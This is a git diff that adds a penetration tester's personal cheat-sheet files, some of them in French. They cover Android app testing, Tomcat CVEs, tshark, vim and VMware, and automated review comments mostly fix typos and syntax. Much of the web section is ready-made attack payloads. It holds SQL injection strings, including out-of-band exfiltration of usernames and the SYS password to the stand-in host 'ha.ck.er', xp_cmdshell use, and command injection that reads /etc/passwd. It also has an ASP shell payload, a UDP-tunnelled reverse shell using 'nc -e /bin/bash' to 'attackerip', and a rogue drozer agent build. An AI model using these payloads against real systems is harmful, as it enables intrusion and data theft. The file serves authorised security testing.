+- secret codes
+
+
+* file and folder perms
+umask of 0077 since 4.0
+droidwall race condition
+
+* file encryption
+SQLCipher => grep for openOrCreateDatabase()
+hooking encryption key with Cydia Substrate (http://blog.mdsec.co.uk/2014/02/hooking-sqlcipher-crypto-keys-with.html)
+
+* sd card
+app storing files on sd card is exposing them to any app with android.permission.READ_EXTERNAL_STORAGE permission on <4.4
+whatsapp + static AES key
+
+* logging
+app with READ_LOGS on <4.1
+app logging to file on sdcard
+
+* insecure comms
+cleartext
+
+* webviews
+chromium since 4.4, webkit before
+a WebView still runs within the context of the application that it is embedded in
+is it loading over cleartext or insecure ssl
+
+grep -E addJavascriptInterface|WebView
+
+module install javascript
+run scanner.misc.checkjavascriptbridge -a
+
+* clipboard
+stores last 20 items in /data/clipboard/ (need jdeserialize)
+module install clipboard
+run post.capture.clipboard
+run post.perform.setclipboard mahh123
+
+* local sockets
+adb shell netstat -antp
+tcpdump -s0 -w /data/local/tmp/dump.cap
+adb shell "tcpdump -s 0 -w - | nc -l -p 4444"
+adb forward tcp:4444 tcp:4444
+nc localhost 4444 | sudo wireshark -k -S -i -
+
+* native code
+
+- attaching a debugger
+adb shell setprop debug.db.uid 10053
+adb shell gdbserver :5039 --attach 5345
+adb forward tcp:5039 tcp:5039
+$ android-ndk-r9d/toolchains/arm-linux-androideabi-4.8/prebuilt/linux-x86_64/bin/arm-linux-androideabigdb
+(gdb) target remote :5039
+
+* misconfigured application attributes
+
+- android:allowBackup (4.0+)
+true by default
+run app.package.backup -f com.blah.app
+review code if app extends BackupAgent
+
+adb backup com.blah.app # contains files stode in private data directory and on sdcard
+dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
+
+- android:debuggable
+false by default
+run app.package.debuggable
+
+* misc
+cert ssl pinning, root detection: patching apk or at runtime w/ Cydia Substrate (technically superior to Xposed Framework)
+runtime monitoring -> introspy
+
+grep -Eir 'token|key|secret'
+adb shell screencap -p | sed 's/\r$//' > screen.png
+
+# chapter 8 - identifying and exploiting android implementations issues
+* finding powerful apps
+run app.package.list -p android.permission.INSTALL_PACKAGES
+run app.package.list -u 1000
+
+* finding default document readers
+run app.activity.forintent --action android.intent.action.VIEW --mimetype application/pdf
+
+* browsable activities
+run scanner.activity.browsable (find all BROWSABLE activities or pass -a com.blah.app)
+android.intent.category.BROWSABLE : allows an activity to be invoked from a browser
+example:
+Start drozer - technique 1
+ Start Drozer - technique 2
+used at Movile Pwn2Own via intent bypass on chrome to exploit activities that perform tasks automatically in their onCreate() using the supplied bundle.
+
+* custom update mechanisms
+apps that hold the INSTALL_PACKAGES permission
+
+* remote loading of code (i.e. reflection)
+loading over http or from dexPath or dexOutputDir specified can be replaced by malicious code.
+
+* webviews
+defining a Java/JavaScript interface.
+can I inject JavaScript at any time?
+
+* listening services
+
+* messaging applications
+application that handles data from external sources = possible entry point of attack
+
+* finding local vulns
+
+* rogue agent
+drozer agent build --rogue --server 192.168.1.112:80
+
+* what can an attacker do once he gets a $ shell
+attacker cannot invoke any Java libs (i.e. if app has READ_SMS, attacker wont have access to associated content providers)
+explore SD card if app uid is part of a group
+pm install if app has INSTALL_PACKAGES
+
+* adb
+usb debugging needs to be enabled
+since 4.2.2 there's a authorization popup however mwr found a bypass on 4.2.2-4.4.2 (popup would show after navigating to emergency dialer)
+<4.2 /data/local.prop owned by system would have ro.secure=1 (0 for root), but since 4.2 file replaced by /default.prop owned by root.
+Since 4.3 no file anymore but compile-time flag ALLOW_ADBD_ROOT so exploit requires to overwrite adbd.
+
+* unlocked bootloaders
+
+* disabling lock screen
+android.permission.DISABLE_KEYGUARD
+or removing .key file (storing the lock pattern) will entirely disable lock screen
+
+Gaining root access and removing a key file is possible if the victim has
+unlocked her bootloader and forgotten to lock it again
+
+* cracking pattern or password from their .key file
+
+* simulating user interaction
+input
+
+* extracting app data with physical access
+adb backup -all -shared
+
+# Version / API / Codename
+5.0 21 LOLLIPOP
+4.4W 20 KITKAT_WATCH
+4.4 19 KITKAT
+4.3 18 JELLY_BEAN_MR2
+4.2, 4.2.2 17 JELLY_BEAN_MR1
+4.1, 4.1.1 16 JELLY_BEAN
+4.0.3, 4.0.4 15 ICE_CREAM_SANDWICH_MR1
+4.0, 4.0.1, 4.0.2 14 ICE_CREAM_SANDWICH
+
+3.2 13 HONEYCOMB_MR2
+3.1.x 12 HONEYCOMB_MR1
+3.0.x 11 HONEYCOMB
+2.3.3, 2.3.4 10 GINGERBREAD_MR1
+2.3, 2.3.1, 2.3.2 9 GINGERBREAD
+2.2.x 8 FROYO
+2.1.x 7 ECLAIR_MR1
+2.0.1 6 ECLAIR_0_1
+2.0 5 ECLAIR
+1.6 4 DONUT
+1.5 3 CUPCAKE
+1.1 2 BASE_1_1
+1.0 1 BASE
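Review bot: Several commands in this file carry Unicode dashes instead of ASCII hyphens and will fail when pasted: the `dx` line near the top uses en-dashes (`dx –dex –output=test.jar` should read `dx --dex --output=test.jar`), and the drozer examples `run app.package.info ‐h`, `run app.package.list ‐p …`, `run app.provider.info ‐p …`, `run app.package.list ‐f …` and `--data‐uri` use U+2010 where a plain `-` is needed. The Oberheide blog URL in the "app installation process" section is also broken by non-breaking hyphens and a stray space. The two CVE references are written as `CVE -2013-6271` and `CVE -2013-6272` with a space after the prefix, which defeats searching; they should be `CVE-2013-6271` and `CVE-2013-6272`.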
diff --git a/Cheat Sheet/tomcat b/Cheat Sheet/tomcat
new file mode 100644
index 0000000..cbbaf8d
--- /dev/null
+++ b/Cheat Sheet/tomcat
@@ -0,0 +1,59 @@
+# tomcat
+
+http://tomcat.apache.org/security.html
+
+== CVE-2009-0580 Enumerer les utilisateurs présents dans le tomcat-users.txt
+
+* tomcat-4.0.5
+wfuzz.py -z file -f /path/to/users.txt -d 'j_username=FUZZ' --hc 302 http://127.0.0.1:8080/examples/jsp/security/protected/j_security_check
+
+* tomcat-5.5.25
+utilise pas MemoryRealm par defaut dans conf/server.xml mais UserDatabaseRealm qui ne me semble pas vulnerable
+A confirmer pour les autres versions.
+
+* tomcat-6.0.18
+wfuzz.py -z file -f /tmp/users.txt -d 'j_username=FUZZ&j_password=%' --hw 133 --hl 25 'http://127.0.0.1:8080/examples/jsp/security/protected/j_security_check'
+Le username existe si Content-Length==0.
+
+
+== CVE-2002-1148 Recuperer le code source de pages JSP
+GET /WebApplication2/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp (cf. http://marc.info/?l=bugtraq&m=103288242014253&w=2 et pourtant j'arrive pas avec /admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp)
+testé avec succès sur 4.1.10 et 4.0.4
+
+== CVE-2002-1394 Recuperer le code source de pages JSP
+GET /WebApplication2/servlet/default/index.jsp (cf. https://issues.apache.org/bugzilla/show_bug.cgi?id=13365)
+
+== CVE-2006-3835 Directory listing
+This is expected behaviour when directory listings are enabled. The semicolon (;) is the separator for path parameters so inserting one before a file name changes the request into a request for a directory with a path parameter. If directory listings are enabled, a directory listing will be shown. In response to this and other directory listing issues, directory listings were changed to be disabled by default.
+
+prereqs:
+ - dans conf/web.xml:
+listings
+true
+ - ya pas de fichier listé comme welcome-file dans /WebApplication2/
+exploit: GET /WebApplication2/;index.html ou ;help.do ou ;index.jsp
+
+
+## HTTPS
+# marche tres bien avec tomcat-4.1.31
+
+
+
+
+
+# manager-**
+creds are valid when the following URLs does not return 401
+manager-gui /manager/html
+manager-status /manager/status
+manager-script /manager/text/list
+manager-jmx /manager/jmxproxy
+admin-gui /host-manager/html
+admin-script /host-manager/text/list
+
+
diff --git a/Cheat Sheet/tr b/Cheat Sheet/tr
new file mode 100644
index 0000000..4d53ce4
--- /dev/null
+++ b/Cheat Sheet/tr
@@ -0,0 +1,11 @@
+# tr
+
+# ignorer tout caractere non ascii autre que LF et ' ' -> '~'
+tr -cd '\12\40-\176'
+
+# translate (rot2)
+tr a-z c-za-b
+
+# caesar rot13
+tr a-zA-Z n-za-mN-ZA-M
+tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4
diff --git a/Cheat Sheet/traceroute b/Cheat Sheet/traceroute
new file mode 100644
index 0000000..869679c
--- /dev/null
+++ b/Cheat Sheet/traceroute
@@ -0,0 +1,7 @@
+# traceroute
+
+# traceroute-nanog
+le man contient des exemples interessants
+- buggy hop that forwards packets with a zero TTL
+- hops that doesn't send "time exceeded"s
+- hops using the TTL from our arriving datagram as the TTL in its icmp reply
diff --git a/Cheat Sheet/truecrypt b/Cheat Sheet/truecrypt
new file mode 100644
index 0000000..90a0fe0
--- /dev/null
+++ b/Cheat Sheet/truecrypt
@@ -0,0 +1,4 @@
+# truecrypt
+
+cryptsetup open --type tcrypt path/to/vol.tc blah
+mount /dev/mapper/blah /mnt/tc
diff --git a/Cheat Sheet/tshark b/Cheat Sheet/tshark
new file mode 100644
index 0000000..f58926f
--- /dev/null
+++ b/Cheat Sheet/tshark
@@ -0,0 +1,22 @@
+# tshark
+
+* fmt
+-o column.format:'"Source", "%s", "Destination","%d", "dstport", "%uD"'
+
+* SYN packets only
+tshark -lnn -i eth0 -Y 'tcp.flags.syn==1'
+tshark -lnn -i eth0 -Y 'tcp.flags.syn==1 && tcp.flags.ack==0' -f 'dst host 6.6.6.6'
+
+* http
+tshark -q -lnn -i eth0 -Y http.request -V -f 'dst host 6.6.6.6 and dst port 3000' | sed -e '/Frame [0-9]/,/Hypertext Transfer Protocol/d' -e '/^ \+\[/d' -e '/(Request Method|Request URI|Request Version)/d'
+tshark -q -lnn -i eth0 -Y http.request -V | sed -n -e '/Full request URI: /s,^.\+URI: \(.\+\)\],\1,p' -e '/Line-based text data/{n;p}'
+
+* ssl
+tshark -o "ssl.keys_list:192.168.105.160,443,http,privkey.pem" -Y frame.number==15 -x
+
+* mitm
+tshark -t u -i eth0 -lnn -F libpcap -w spoof.pcap -f "not tcp.analysis.duplicate_ack and not tcp.analysis.retransmission and not arp and host $VICTIM"
+gui: !tcp.analysis.retransmission && !tcp.analysis.duplicate_ack
+
+* extract data
+tshark -r blah.pcap -Y data -T fields -e data.data
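Review bot: The `-f` capture filter in the mitm example mixes display-filter fields into BPF syntax: `tcp.analysis.duplicate_ack` and `tcp.analysis.retransmission` are Wireshark analysis fields, not pcap primitives, so libpcap will reject the expression and tshark will not start. The capture filter should be reduced to `-f "not arp and host $VICTIM"` and the retransmission / duplicate-ACK exclusion applied afterwards as a display filter, exactly as the `gui:` line below already shows.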
diff --git a/Cheat Sheet/twahh b/Cheat Sheet/twahh
new file mode 100644
index 0000000..3659d57
--- /dev/null
+++ b/Cheat Sheet/twahh
@@ -0,0 +1,177 @@
+# webapp hacker's handbook
+
+# SQL injection
+
+* fingerprint db
+MySQL: 'serv' 'ices'
+MS-SQL: 'serv'+'ices'
+Oracle: 'serv'||'ices'
+Postgres: 'serv'||'ices'
+
+Oracle: BITAND(1,1)-BITAND(1,1)
+MS-SQL: @@PACK_RECEIVED-@@PACK-RECEIVED
+MySQL: CONNECTION_ID()-CONNECTION_ID()
+MySQL: /*!32302 and 1=0*/ # will cause the select stmt to be false if the version in use is greater than or equal to 3.23.02
+
+* Oracle
+select object_name,object_type from user_objects
+select column_name from user_tab_columns where table_name='USERS'
+
+* MS-SQL
+' union select name,null from sysobjects where xtype = 'U'
+' union select b.name,null from sysobjects a,syscolumns b where a.id=b.id and a.name='users'--
+
+* determine number of columns and their data type in a select
+' order by 1--
+' order by 2--
+or
+' union select null,null-- # but note the additional row of data containing the word NULL or an empty string
+
+' union select 'a',null,null
+' union select null,'a',null
+
+* enumerating table and column names (MS-SQL)
+' having 1=1-- # error says column 'users.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
+' group by users.ID having 1=1-- # error says column 'users.username' ...
+' group by users.ID, users.username having 1=1-- # does not result in any error msg
+next step is to determine data types of each column
+' union select sum(username) from users-- # The sum cannot take a varchar data type as an argumenet
+' union select sum(ID) from users-- # must have an equal number of expressions... so ID in a numeric data type
+you then do
+'; insert into users values( 666, 'attacker')--
+
+
+' or 1 in (select @@version)--
+Other ways of causing the db to attempt to convert a string value to a numeric data type:
+1+@@version
+SELECT CAST(@@version AS int)
+
+' or 1 in (select min(username) from users where username > 'a')-- # returns "aaron"
+' or 1 in (select min(username) from users where username > 'aaron')--
+
+* filter doubles up single quotes
+the payload "admin'--" will not work
+SELECT * FROM users WHERE username = 'admin''--' and password = '' -> user == "admin'--"
+but filter truncates input to 20 chars
+payload login: aaaaaaaaaaaaaaaaaaa'
+payload passw: [space]or 1=1--
+SELECT * FROM users WHERE username = 'aaaaaaaaaaaaaaaaaaa'' and passsword = ' or 1=1--' -> user == "aaaaaaaaaaaaaaaaaaa' and password = "
+test with:
+''''''''''''''''''''''''''''''''''''''''''''' ... # even number
+a'''''''''''''''''''''''''''''''''''''''''''' ... # odd number
+
+* Second-Order
+INSERT INTO users (username, password, ID, privs) VALUES ('foo''', ... -> inserts "foo'" in db
+SELECT password FROM users WHERE username = 'foo'' -> unclosed quotation mark before 'foo
+
+payload: ' or 1 in (select password from users where username ='admin')--
+will show the admin's password in error msg
+
+* Out-of-Band exfiltration
+MS-SQL: OpenRowSet
+insert into openrowset('SQLOLEDB','DRIVER=(SQL Server);SERVER=ha.ck.er:80;UID=sa;PWD=p4ss','select * from foo') values (@@version)
+
+Oracle
+UTL_HTTP supports proxy servers, cookies, redirects, and authentication
+'||UTL_HTTP.request('ha.ck.er:80/'||(select username from all_users where rownum=1))--
+
+UTL_INADDR
+UTL_INADDR.GET_HOST_NAME((select password from dba_users where username='SYS')||'ha.ck.er')
+
+UTL_SMTP, UTL_TCP, UTL_FILE (read/write files) ...
+
+MySQL
+select * into outfile '\\\\ha.ck.er\share\output.txt' from users;
+
+* Conditional errors
+select 1/0 from dual where (select username from all_users where username = 'DBSNMP') = 'DBSNMP' # if user exists, this causes an error
+
+* Time-based
+MS-SQL
+'; waitfor delay '0:30:0'--
+; waitfor delay '0:30:0'--
+' waitfor delay '0:30:0'--
+
+* Privesc
+MS-SQL
+master..xp_cmdshell 'ipconfig > foo.txt' # can create out-of-band connections, uploading backdoor ...
+xp_regread / xp_regwrite
+
+select * from OpenRowSet('SQLOLEDB', 'uid=sa,pwd=foobar;Network=DBMSSOCN;Address=192.168.9.1,80;timeout=5','')
+ - port scan
+ - bruteforce creds of other databases
+ - connect back to local host and attempt to guess the password of the sa account
+
+MySQL
+FILE_PRIV
+stores data in plaintext files
+UDF (https://github.com/hatRiot/sql3_udf)
+
+# OS command injection
+node=a|cat /etc/passwd
+view=last5.log && dir c:\
+
+|| ping -c 30 127.0.0.1; x || ping -n 30 137.0.0.1 &
+| ping -c 30 127.0.0.1 |
+| ping -n 30 127.0.0.1 |
+& ping -c 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+; ping 127.0.0.1 ;
+%0a ping -c 30 127.0.0.1 %0a
+`ping 127.0.0.1`
+
+php:
+eval("$_GET['vuln']");
+?vuln=\$foo%3Dbar;%20echo%20file_get_contents('/etc/passwd')
+
+asp:
+Execute(Request("vuln"))
+?vuln=foo%3Dbar:response.write%2031337
+?vuln=foo%3Dbar:+Dim+oScript:+Set+oScript+=+Server.CreateObject("WSCRIPT.SHELL"):+Call+oScript.Run+("cmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txt",0,True)
+
+# XML injection
+john
+john
+and see if app returns error, and how app retuns your input
+
+# XPath injection (tool: https://github.com/feakk/xxxpwn, https://github.com/orf/xcat)
+informed
+' or 1=1 and 'a'='a
+' or 1=2 and 'a'='a
+
+blind
+extract the name of the current node's parent
+' or substring(name(parent::*[position()=1]),1,1)='a
+' or substring(name(parent::*[position()=1]),1,1)='b # false condition
+then cycle through each of its child nodes, extracting all of their na,es and values
+//address[position()=3]/child::node()[position()=4]/text() # node username
+//address[position()=3]/child::node()[position()=6]/text() # node password
+
+' or substring(//address[position()=3]/child::node()[position()=6]/text(),1,1)='P' and 'a'='a
+
+By cycling through every node, you can extract the entire contents of the XML
+
+detect
+' or 'a'='a
+' and 'a'='b
+ or 1=1
+ and 1=2
+(your tests for SQLi will reveal it)
+' or count(parent::*[position()=1])=0 or 'a'='b
+' or count(parent::*[position()=1])>0 or 'a'='b
+or
+1 or count(parent::*[position()=1])=0
+1 or count(parent::*[position()=1])>0
+
+# LDAP
+detect
+)))))
+*);cn;
+*));cn;
+*)));cn;
+...
+
+john);mail,cn,l,st,c
+
+# scanners don't work
+Vulnerabilities Detected by Scanners (p649-...)
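Review bot: The MS-SQL fingerprint line `@@PACK_RECEIVED-@@PACK-RECEIVED` has a hyphen in the second identifier, so the two halves are not the same variable and the expression does not evaluate to zero as intended; presumably both should read `@@PACK_RECEIVED`. In the OS command injection timing list, `ping -n 30 137.0.0.1` looks like a transposition of the loopback address used on every neighbouring line (`127.0.0.1`). The truncation example in the "filter doubles up single quotes" section spells the column `passsword`, which is inconsistent with the `password` column used in the other statements.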
diff --git a/Cheat Sheet/typo b/Cheat Sheet/typo
new file mode 100644
index 0000000..330d4e2
--- /dev/null
+++ b/Cheat Sheet/typo
@@ -0,0 +1,11 @@
+# typo
+
+* typo squatting
+http://www.morningstarsecurity.com/research/urlcrazy
+https://github.com/nccgroup/typofinder
+
+* bitflipping
+http://www.security-assessment.com/files/documents/presentations/Nick_Freeman-DNS_Shenanigans-Kiwicon7_2013.pdf
+
+* rowhammer
+http://googleprojectzero.blogspot.com.au/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
diff --git a/Cheat Sheet/udptunnel b/Cheat Sheet/udptunnel
new file mode 100644
index 0000000..c67497e
--- /dev/null
+++ b/Cheat Sheet/udptunnel
@@ -0,0 +1,18 @@
+# udptunnel
+
+# bind shell listening on UDP
+victim:
+./udptunnel -s 53
+
+attacker:
+./udptunnel -c 127.0.0.1 2222 attackerip 53 127.0.0.1 22
+ssh -p 2222 127.0.0.1
+
+# reverse shell listening on UDP
+attacker:
+./udptunnel -s 53
+nc -vnlp 1234
+
+victim:
+./udptunnel -c 127.0.0.1 4321 attackerip 53 127.0.0.1 1234
+nc -vn 127.0.0.1 4321 -e /bin/bash
diff --git a/Cheat Sheet/ultravnc b/Cheat Sheet/ultravnc
new file mode 100644
index 0000000..7a62796
--- /dev/null
+++ b/Cheat Sheet/ultravnc
@@ -0,0 +1,3 @@
+# ultravnc
+
+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\
diff --git a/Cheat Sheet/usb b/Cheat Sheet/usb
new file mode 100644
index 0000000..f2b5419
--- /dev/null
+++ b/Cheat Sheet/usb
@@ -0,0 +1,16 @@
+# usb
+
+* u3
+http://nullsecurity.net/tools/backdoor.html u3-pwn by nullsecurity
+
+* badusb
+https://github.com/adamcaudill/Psychson
+
+* teensy
+http://malware.cat/?p=89
+
+* rubby ducky
+http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
+
+* usb assessment
+https://github.com/nccgroup/umap
diff --git a/Cheat Sheet/useragent b/Cheat Sheet/useragent
new file mode 100644
index 0000000..066320f
--- /dev/null
+++ b/Cheat Sheet/useragent
@@ -0,0 +1,20 @@
+# useragent
+http://johnbokma.com/mexit/2004/04/24/changinguseragent.html
+
+about:config
+* New string -> "general.useragent.override"
+Mozilla/5.0 (compatible; Mozilla/4.0; MSIE 6.0; Windows NT 5.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (fresh firefox install on WinXPProSP2Fr)
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) (ma VM winXP avec IE8)
+Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
+Mozilla/5.0 (Windows; U; Windows NT 5.1)
+
+* unset general.useragent.vendor and general.useragent.extra.firefox
+
+# google bot crawler
+Googlebot/2.1 (+http://www.googlebot.com/bot.html)
+Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
+Googlebot/1.0 (googlebot@googlebot.com http://googlebot.com/)
+
+# detection
+http://user-agent-string.info
diff --git a/Cheat Sheet/uuid b/Cheat Sheet/uuid
new file mode 100644
index 0000000..821447e
--- /dev/null
+++ b/Cheat Sheet/uuid
@@ -0,0 +1,6 @@
+# uuid
+
+version 1 UUID is composed of a timesteamp and the server's MAC address
+
+# version identification
+http://stackoverflow.com/a/1709834
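Review bot: The version 1 line could spell out the consequence: because the value is derived from a timestamp and the node's MAC address, v1 UUIDs are both predictable and leak host identity, so they must not be used as session identifiers, reset tokens or any other value that has to be unguessable (a version 4 UUID from a CSPRNG is the appropriate choice there). Also `timesteamp` → `timestamp`.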
diff --git a/Cheat Sheet/vagrant b/Cheat Sheet/vagrant
new file mode 100644
index 0000000..e47c7ae
--- /dev/null
+++ b/Cheat Sheet/vagrant
@@ -0,0 +1,6 @@
+# vagrant
+
+mkdir v && cd v
+vagrant box add ubuntu/trusty64 --box-version 20160621.0.0
+vagrant init ubuntu/trusty64 --box-version 20160621.0.0
+
diff --git a/Cheat Sheet/vdi b/Cheat Sheet/vdi
new file mode 100644
index 0000000..44f2c61
--- /dev/null
+++ b/Cheat Sheet/vdi
@@ -0,0 +1,4 @@
+# vdi virtuall desktop infrastructure
+
+# HP thin client
+http://blog.malerisch.net/2015/04/pwning-hp-thin-client.html
diff --git a/Cheat Sheet/vim b/Cheat Sheet/vim
new file mode 100644
index 0000000..64d4de8
--- /dev/null
+++ b/Cheat Sheet/vim
@@ -0,0 +1,78 @@
+# vim
+
+# hex
+:%!xxd
+editing
+:%!xxd -r
+:wq
+
+# hexadecimal editors
+010editor (reset trial: rm "/home/seb/.config/SweetScape/010 Editor.ini")
+hte
+hexedit
+hexinator https://hexinator.com/
+HxD
+
+# buffers
+* horizontal
+vim -oN
+:new C-W C-N
+:sp[lit]
+
+* vertical
+vim -ON
+:vnew
+:vs[plit]
+C-W C-V
+C-W C-O (close)
+
+# dictionnaire, spell, correction orthographe
+setlocal spell spelllang=fr
+
+]s goto next
+z= show suggestions
+
+# tabulation et espaces
+set softtabstop=2 # pour que la touche TAB indente au lien d'inserer un TAB
+set expandtab # pour que les tabulations soient converties en espaces
+set tabstop=4 # pour que les tabulations soient affichés comme 4 espaces
+set shiftwidth=2 # pour que la touche TAB indente de 2 espaces
+
+# better than ctags+cscope
+http://ruben2020.github.io/codequery/
+
+# ctags
+* Creation du fichier tags avec chemins absolus (--links pour suivre les liens symboliques)
+$ ctags -R --languages=TCL --links=yes $PWD
+
+# cscope
+* Création du fichier cscope.out (-L pour suivre les liens symboliques)
+find -L $PWD -name '*.tcl' | cscope -i- -b
+
+* Ajouter la section suivante dans ~/.vimrc
+if has("cscope")
+ "set csprg=/usr/local/bin/cscope
+ set csto=0
+ set cst
+ set nocsverb
+ " add any database in current directory
+ if filereadable("cscope.out")
+ cs add cscope.out
+ " else add database pointed to by environment
+ elseif $CSCOPE_DB != ""
+ cs add $CSCOPE_DB
+ endif
+ set csverb
+endif
+
+# Sans l'option -E, j'ai remarqué qu'il ignorait au moins un fichier .tcl, ce
+# qui est très gênant (c'est peut-être parce qu'il était encodé en UTF-8 va
+# savoir...)
+$ glimpseindex -E -o $PWD
+$ glimpse blah
+
+# vimdiff
+do -- Get changes from other window into the current window.
+dp -- Put the changes from current window into the other window.
+]c -- Jump to the next change.
+[c -- Jump to the previous change.
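Review bot: The four `set` lines in the tab section use `#` as a comment marker, which Vim script does not recognise, so pasting `set softtabstop=2 # pour que la touche TAB ...` into a vimrc fails with an unknown-option error on `#`. Vim's comment character is `"`, e.g. `set softtabstop=2 " TAB indents instead of inserting a tab`; the cscope block further down in the same hunk already uses `"` correctly. The `:%!xxd` / `:%!xxd -r` hex round-trip at the top is usually paired with `vim -b` (binary mode) so that writing the file does not append a trailing newline or re-encode bytes, which is worth noting next to it.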
diff --git a/Cheat Sheet/virtd b/Cheat Sheet/virtd
new file mode 100644
index 0000000..2a4d26d
--- /dev/null
+++ b/Cheat Sheet/virtd
@@ -0,0 +1,43 @@
+# virtd
+
+# restarting dnsmasq
+virsh net-destroy default
+virsh net-start default
+
+# disable dhcp
+virsh
+net-edit default
+
+ default
+ 8a32d862-bd28-4cb5-84b6-cfecd954dd25
+
+
+
+
+-
+-
+-
+
+
+
+# snapshots
+http://fedoraproject.org/wiki/Features/Virt_Live_Snapshots
+qemu-img convert -f raw -O qcow2 w2k8r2sp1x64-adpoc.img w2k8r2sp1x64-adpoc.qcow2
+
+virsh # snapshot-create w2k8r2sp1x64-adpoc
+Domain snapshot 1385009602 created
+virsh # snapshot-list w2k8r2sp1x64-adpoc
+ Name Creation Time State
+------------------------------------------------------------
+ 1385009602 2013-11-21 15:53:22 +1100 running
+
+virsh # snapshot-revert w2k8r2sp1x64-adpoc --snapshotname 1385009602
+or
+virsh # snapshot-revert w2k8r2sp1x64-adpoc 1385009602 --force
+
+# dnsmasq virtd
+log-queries
+log-facility=/tmp/dnsmasq-virt.log
+cache-size=0
+#no-resolv
+#server=8.8.8.8
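Review bot: `log-facility=/tmp/dnsmasq-virt.log` sends the query log to a predictable path in a world-writable directory, so another local user can pre-create or symlink that file before it is opened with the service's privileges; a directory owned by the service is safer, e.g. `log-facility=/var/log/dnsmasq/virt.log`. `log-queries` also records every lookup made by the guests, which is sensitive data in its own right and should be rotated and access-restricted accordingly. The `net-edit default` excerpt earlier in this hunk appears to have lost its XML markup (only `default` and the UUID survive), so it cannot be pasted back as-is.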
diff --git a/Cheat Sheet/virtualbox b/Cheat Sheet/virtualbox
new file mode 100644
index 0000000..c2b9bc9
--- /dev/null
+++ b/Cheat Sheet/virtualbox
@@ -0,0 +1,4 @@
+# virtualbox
+
+# disable timesync between host and guest (run from normal user shell)
+vboxmanage setextradata vagrant-win7-ie11_default_1485564881211_9934 "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1
diff --git a/Cheat Sheet/vlan b/Cheat Sheet/vlan
new file mode 100644
index 0000000..22b71d2
--- /dev/null
+++ b/Cheat Sheet/vlan
@@ -0,0 +1,10 @@
+# vlan
+
+# vlan hopping
+http://ucsniff.sourceforge.net
+http://voiphopper.sourceforge.net
+
+https://github.com/commonexploits/vlan-hopping
+frogger (www.commonexploits.com/?p=444)
+
+
diff --git a/Cheat Sheet/vms b/Cheat Sheet/vms
new file mode 100644
index 0000000..33310b6
--- /dev/null
+++ b/Cheat Sheet/vms
@@ -0,0 +1,6 @@
+# vms virtual machines
+
+modern.ie vagrant boxes https://github.com/kadimi/wagrant
+http://bitnami.com/stacks
+modern.ie // ready to go images
+http://www.turnkeylinux.org // ready to go images
diff --git a/Cheat Sheet/vmware b/Cheat Sheet/vmware
new file mode 100644
index 0000000..773b52b
--- /dev/null
+++ b/Cheat Sheet/vmware
@@ -0,0 +1,35 @@
+# vmware
+
+# esx users par defaut
+root, dcuiuser, vpxuser
+dcuiuser ou dcui selon les versions
+normalement dcui est locké mais ca coute rien de tester
+
+# default passwords
+http://www.kendrickcoleman.com/index.php/Tech-Blog/list-of-vmware-default-usernames-and-passwords.html
+
+# old vuln
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-002/?fid=3766
+
+# pb
+desc: au lancement de la console vmware (vmware-1.0.8.126538):
+$ vmware
+Xlib: extension "RANDR" missing on display ":0.0".
+/opt/vmware/server/lib/bin/vmware: symbol lookup error: /usr/lib/libgio-2.0.so.0: undefined symbol: g_thread_gettime
+
+solution :
+export VMWARE_USE_SHIPPED_GTK=force
+export LIBXCB_ALLOW_SLOPPY_LOCK=1
+
+# pb
+desc: "host clock rate change request" dans les logs
+solution: ajouter host.useFastClock = FALSE dans /etc/vmware/config
+
+# pour recuperer le clavier
+setxkbmap -layout fr
+
+# pour connaitre les versions
+http://www.vmware.com/patch/download/
+
+# convert multi vmdk files to a single raw file
+qemu-img convert -O raw -f vmdk SpiderLabs-VRPT.vmdk blah.raw
diff --git a/Cheat Sheet/vpn b/Cheat Sheet/vpn
new file mode 100644
index 0000000..e97acca
--- /dev/null
+++ b/Cheat Sheet/vpn
@@ -0,0 +1,9 @@
+# vpn
+
+# bonne intro vpn
+http://www.symantec.com/connect/fr/articles/penetration-testing-ipsec-vpns
+
+# client
+vpnc (client Cisco) pour examiner les paquets en reçus (et trouver son IP interne dans le champ id.data)
+Et ainsi en deduire q toutes les IP aboutissent sur le meme serveur VPN
+
diff --git a/Cheat Sheet/vuln_by_design b/Cheat Sheet/vuln_by_design
new file mode 100644
index 0000000..287e9e2
--- /dev/null
+++ b/Cheat Sheet/vuln_by_design
@@ -0,0 +1,36 @@
+# vuln by design
+
+http://www.amanhardikar.com/mindmaps/Practice.html
+https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project
+https://github.com/google/firing-range
+
+https://hack.me/
+http://vulnhub.com/
+
+http://testasp.vulnweb.com/
+http://testphp.vulnweb.com/
+
+http://php.testsparker.com
+http://aspnet.testsparker.com
+
+demo.testfire.net
+zero.webappsecurity.com (msaccess!)
+https://github.com/cr0hn/vulnerable-node (NodeJS website)
+
+http://code.google.com/p/wavsep/ (to eval scanners)
+damn vulnerable web app
+webgoat
+bodgeit
+jarlsberg
+wackopicko
+mutillidae # pas de svn
+vicnum (online version: http://vicnum.ciphertechs.com/)
+vulnlamp (me rappelle plus)
+moth
+hacmebank https://www.owasp.org/index.php/HacmeBank http://code.google.com/p/owasp-hacmebank/
+pwn-me https://github.com/lnxg33k/pwn-me
+puzzlemall http://code.google.com/p/puzzlemall/
+
+http://g0tmi1k.blogspot.com.au/2011/03/vulnerable-by-design.html
+http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
+https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
diff --git a/Cheat Sheet/waf b/Cheat Sheet/waf
